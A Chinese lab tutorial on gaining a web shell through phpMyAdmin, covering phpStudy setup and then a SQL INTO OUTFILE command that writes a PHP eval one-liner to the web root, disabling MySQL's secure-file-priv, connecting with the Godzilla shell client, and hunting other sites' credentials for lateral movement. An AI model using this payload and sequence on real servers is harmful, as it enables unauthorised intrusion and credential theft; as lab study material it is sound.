phpMyAdmin权限提升

免责声明:本文技术仅用于网络安全学习研究,请严格遵守《网络安全法》等相关法律法规,严禁未经授权对任何网络、系统实施攻击或测试,违规操作引发的一切法律责任由使用者自行承担,作者不承担连带责任。

一、环境搭建

小皮下载phpMyAdmin,绑定好网站

网站配置

对应php版本要求5.5以上,需要使用https

下载好高版本php,去网站管理这里设置

选择https,生成开发者测试证书,会自动填充,确认之后等待apache重启

用户名和密码为绑定的网站的(实战中可通过泄露得到)

登陆进去,出现报错:配置文件现在需要一个短语密码。

在下载的phpMyAdmin目录下找到文件"config.sample.inc.php"

将文件复制,重命名为"config.inc.php"

打开找到$cfg'blowfish_secret' = '';这一行,在单引号里填入任意字符串(长一些)

保存文件后刷新页面,报错解决

警告:Undefined index: utf8

还是config.inc.php文件,在数据库配置段添加字符集定义

cfg\['Servers'\]\[i]'charset' = 'utf8';

cfg\['Servers'\]\[i]'collation_connection' = 'utf8_general_ci';

二、实操

SQL命令行写入木马文件

复制代码
SELECT '<?php eval($_POST["pass"]);?>' INTO OUTFILE 'D:\\phpstudy_pro\\WWW\\1.php'

(实战中phpMyAdmin存放目录可尝试通过报错得到,\\双写防止转义)

报错,原因是 secure-file-pive是MySQL 安全限制参数,用于禁止**SELECT ... INTO OUTFILE** 随意写入服务器文件

解决:找到小皮当前使用数据库的my.ini配置文件,在mysqld写入secure-file-priv = "",保存,重启数据库

写入成功

访问1.php文件

哥斯拉连接

连接成功

横向移动的话可以去查找该数据库下其他网站配置文件等,查找源码或登录的账号密码之类的。

相关推荐
数据知道7 小时前
邮件安全实战:SPF/DKIM/DMARC 配置与钓鱼绕过
网络·安全·web安全·网络安全·邮件安全
世界尽头与你11 小时前
Android Root 检测原理
android·安全·网络安全·渗透测试
kp0000011 小时前
如何平衡模型输出的“有用性”和“安全性
人工智能·安全·网络安全·信息安全·ai安全
世界尽头与你13 小时前
iOS 越狱检测原理
安全·网络安全·ios·信息安全·渗透测试
kp000001 天前
大模型输出造成信息泄露类型
人工智能·网络安全·信息安全·ai安全
kp000001 天前
System Prompt Leakage(系统提示词泄露)及安全防御
网络·安全·网络安全·信息安全·prompt·ai安全
X7x51 天前
攻防对抗的结构化思维:深度拆解网络杀伤链(Kill Chain)与现代防御演进
网络安全·网络攻击模型·安全架构·网络杀伤链·kill chain
kp000001 天前
AI大模型,如何区分善意提问与Prompt注入攻击
人工智能·网络安全·信息安全·prompt·ai安全
kp000001 天前
AI系统输入安全基线
人工智能·安全·网络安全·信息安全·ai安全